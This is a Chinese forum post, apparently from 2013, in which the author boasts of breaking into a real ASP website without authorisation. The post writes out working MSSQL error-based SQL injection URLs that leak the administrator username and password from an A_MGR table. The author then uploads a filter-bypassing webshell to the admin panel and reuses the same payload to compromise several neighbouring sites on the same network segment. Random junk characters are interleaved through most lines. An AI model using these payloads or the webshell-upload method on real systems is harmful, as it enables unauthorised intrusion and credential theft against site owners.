发现一个注入点
9 R/ Q) }: F. X) Nhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389" N, S1 A! e; U6 f
9 a6 P2 Y) _7 ]7 {
习惯性的加’having1=1--
1 b0 _' H X6 o9 A/ m4 O
4 B9 p, T! ?" r) i/ Zhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—) D2 v/ S# d- h% o7 s& B0 k
3 x" r4 B, Q' f
0: F5 U8 t* j/ G: N0 e+ ~
1 S, R4 ?5 {3 l! ?- R, `0 [爆出Diary_A.dl_Title(这时候很激动啊)' r+ {" m2 j9 r0 U( o
- a Y6 d* Z2 V3 h7 `& { `6 Y% p
那么继续+ B. Z6 ?# k$ l$ Y+ p
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
: _% T" @% R/ Z7 @! ~% y1 h+ c0 g+ y" o# p/ E5 s
继续,一直爆下去
& [. ^" g% j% s# }$ i. o4 W- F- b4 P& r7 |" }4 F8 a
爆到几个字段和表段 但是没找到需要的管理用户的字段% s3 [1 |& h. ^. O1 z
+ }, I' r/ W$ i* v$ [蛋疼了 怎么办 然后去后台登陆页看源码
' L* Y( Y2 R! N4 e. P2 F# g
7 E# `9 K! _) |0
4 f. O! y, B; O2 u3 ~0 i$ H
9 Q+ q/ e: X( G6 vInput name= “ADUID”* v8 Z' M i4 r: g7 q4 I$ l) a! M
Input name= “ADPWD”1 R; c5 j. \" w" `. ~0 e2 ]
' g$ r( T9 J0 V) I" ^- Q很幸运 找到了字段那就继续8 Z) @8 `2 Y% h3 Q3 Z; i6 |4 J
找到之后开始爆用户
3 F+ P+ S+ t4 p/ @8 {+ L# r- Thttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—8 M( S1 j5 F: O) E9 A$ @: e; L. j
爆密码
. i+ W8 Q% S9 W+ t1 n6 Vhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—) l7 t- g7 m6 V; i
测试了下 这个注入点只能爆到文章哪里的表 8 d9 I: d9 q4 Z6 y
8 K: I x! y/ s8 }头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
7 J9 F! _. E3 S4 f1 y- ]
" z! ]/ ?2 V4 p( i; ^又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
6 H6 z: ^: h# L) H. }8 \$ ^4 I
+ u$ E. _. J1 F0 \7 ~473
( H9 @( |! G# d8 k x
& W, \. p( w1 L" j9 Z进后台7 t/ J# R; }3 y J& i
9 \2 n5 T9 [$ }: Z, ^
5 ~& [; @4 x3 W; E# [发现几个上传点 有的地方不能上传 而且防止恶意代码- ~$ S/ E% h) Z) Q6 y
0 v* B0 f: _3 ~& L: i: `. n
没办法 各种百度各种找大牛 找到一只好像可以突破的马
5 P9 Q! e; i! D+ A( C( \. z/ {/ @- Z0 Z4 a0 X' J" u6 T
8 n" D& |! ?0 @# ]; ?1 c& c( |在系统管理那里直接上传 不过没有显示地址& F* D: E# r2 \. G
. j) O# L' I, _' X7 s" a再上传一次 抓包 搞定OK4 Q0 u: ^ l9 G2 B
& z' U* n/ f. F5 @6 J
* B L0 C S/ e3 M6 F* X6 G, ~+ n( F! f* D. o2 ~$ Q$ a) G
472
9 A. q/ y z+ t/ M+ g4 _3 y- M( p& q, t, V& V8 m1 A
晚上不行了 去睡觉。。。
" A% v$ j$ r9 p8 i; v2 B, I0 J, A第二天刚起床 闲的没事做继续日站吧
) M& G* B$ G. N8 {
# q) ?! [ w, U7 L找个站 就把这个站的旁c扫了下6 _4 g* w' g- y1 x# g
2 b) S/ V3 a' x" v/ B- U$ l5 @( R( z1 T发现c段也有一个购物站 ,然后还和这个站的模板差不多
& K- s: b" P3 T: _/ d0 T- k$ q- @2 I' A" n4 T' O5 k* C P# p
就找到会员登录口测试
4 K; w7 i$ J3 K$ }- q! j1 C! i* ]' X. y: z- c, b" {4 r. ?
'and (select top 1 MGR_UID from A_MGR)>0—/ [2 W& L& W4 H* f
果断爆到了 这时候我很激动 通杀7 V6 l2 U3 G' }
$ m) D6 ^* j" t/ _再次翻c段
: h$ Y0 V8 g& |1 y
' Z ]( x9 q; \8 {$ h1 y翻出几个站 都成功拿下
' ?. |9 v4 ^( D. o% @! ^, g
\8 x4 x6 C! q% C$ a* G8 n( H4 e3 n+ Q2 \
0 M. Q: O9 u; H% z3 _. T& K1 w修复方案:# _! y! W6 [% j/ Y4 s5 q b
他们比我专业
9 \; H' s* U& b0 t7 b( W0 Y) X z9 |; ?* x! A
, N# d0 |: h) B
( \3 e; S% A$ E9 n4 O3 m
|
发表于 2013-4-4 17:40:38
收藏
支持
反对